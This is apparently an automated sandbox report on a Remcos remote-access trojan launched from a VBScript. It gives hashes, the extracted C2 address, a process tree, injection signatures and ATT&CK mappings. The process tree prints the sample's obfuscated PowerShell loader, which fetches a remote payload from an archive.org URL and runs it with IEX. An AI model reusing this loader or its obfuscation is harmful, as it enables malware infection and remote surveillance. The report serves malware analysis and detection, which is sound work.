remcos | b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388

General

Target

2.vbs
Size

662B
MD5

8da164753530662b1f603f7b23413223
SHA1

18a3665edcb3b3d3c53f9755bc225569a64ae642
SHA256

b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
SHA512

b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0

Score

10^/10

remcos rat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

7 2032 powershell.exe
9 2032 powershell.exe
11 2032 powershell.exe
13 2032 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1672 set thread context of 1628 1672 powershell.exe aspnet_regbrowsers.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
7	2032	powershell.exe
9	2032	powershell.exe
11	2032	powershell.exe
13	2032	powershell.exe

description	pid	process	target process
PID 1672 set thread context of 1628	1672	powershell.exe	aspnet_regbrowsers.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.exe

pid	process
2032	powershell.exe
2032	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2032 powershell.exe
Token: SeDebugPrivilege 1672 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_regbrowsers.exe

pid process

1628 aspnet_regbrowsers.exe

description	pid	process
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe

pid	process
1628	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 368 wrote to memory of 2032	368	WScript.exe	powershell.exe
PID 368 wrote to memory of 2032	368	WScript.exe	powershell.exe
PID 368 wrote to memory of 2032	368	WScript.exe	powershell.exe
PID 2032 wrote to memory of 1672	2032	powershell.exe	powershell.exe
PID 2032 wrote to memory of 1672	2032	powershell.exe	powershell.exe
PID 2032 wrote to memory of 1672	2032	powershell.exe	powershell.exe
PID 1672 wrote to memory of 708	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 708	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 708	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 708	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1124	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1124	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1124	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1124	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1004	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1004	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1004	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1004	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1344	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1344	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1344	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1344	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1972	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1972	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1972	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1972	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	aspnet_regbrowsers.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
6e9a7aa8321f264772ea32e4d912cbda

SHA1
06c8aa1f7a5698f32bcd36e61a10cdd218880232

SHA256
21069802d40e4ae283ea9289b827580d12f000c408b769a051dc430c956f8519

SHA512
da47bbe8f12998993312f9a40a4d84476f5abcf7cd4bb90014fbf4461cf078261ef7fd899828d35b2d81b00202b7bc9295464969ff58fb28ddd629f480a73cbd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
b870fb4c34b3de2001a769fcebdda51c

SHA1
649bfed97cfbccbbc57516f62b30dea0a8e3547a

SHA256
15ae9f521efdf58238619bb7cd2a2a0ab4c3097a52e7ca7b67c249baaa653de8

SHA512
1f9778b71144f1f7403158cfa4b5fe1f87f971cd7c5ca1e13ea12411f90130f1bd1be89ee2c77f3e50f20bbef055de153c616b5b2bc28213c7ffa5d4fe9f208c

Download Submit
C:\Users\Public\ Microsoft.ps1
MD5
b5795726bb04f5f9584184ae1f50777b

SHA1
91b250e76c41066a009b70200c5254a40980228b

SHA256
5d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784

SHA512
10ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb

Download Submit
memory/368-59-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp

Filesize
8KB

Download
memory/1628-88-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1628-87-0x0000000076661000-0x0000000076663000-memory.dmp

Filesize
8KB

Download
memory/1628-86-0x000000000042EEEF-mapping.dmp

Download
memory/1628-85-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1672-70-0x0000000000000000-mapping.dmp

Download
memory/1672-77-0x000000001A9F0000-0x000000001A9F2000-memory.dmp

Filesize
8KB

Download
memory/1672-78-0x000000001A9F4000-0x000000001A9F6000-memory.dmp

Filesize
8KB

Download
memory/1672-82-0x0000000002690000-0x00000000026A8000-memory.dmp

Filesize
96KB

Download
memory/2032-69-0x000000001B920000-0x000000001B921000-memory.dmp

Filesize
4KB

Download
memory/2032-68-0x000000001B850000-0x000000001B851000-memory.dmp

Filesize
4KB

Download
memory/2032-67-0x0000000001D90000-0x0000000001D91000-memory.dmp

Filesize
4KB

Download
memory/2032-66-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

Filesize
8KB

Download
memory/2032-65-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

Filesize
8KB

Download
memory/2032-64-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/2032-63-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/2032-62-0x0000000001D50000-0x0000000001D51000-memory.dmp

Filesize
4KB

Download
memory/2032-60-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing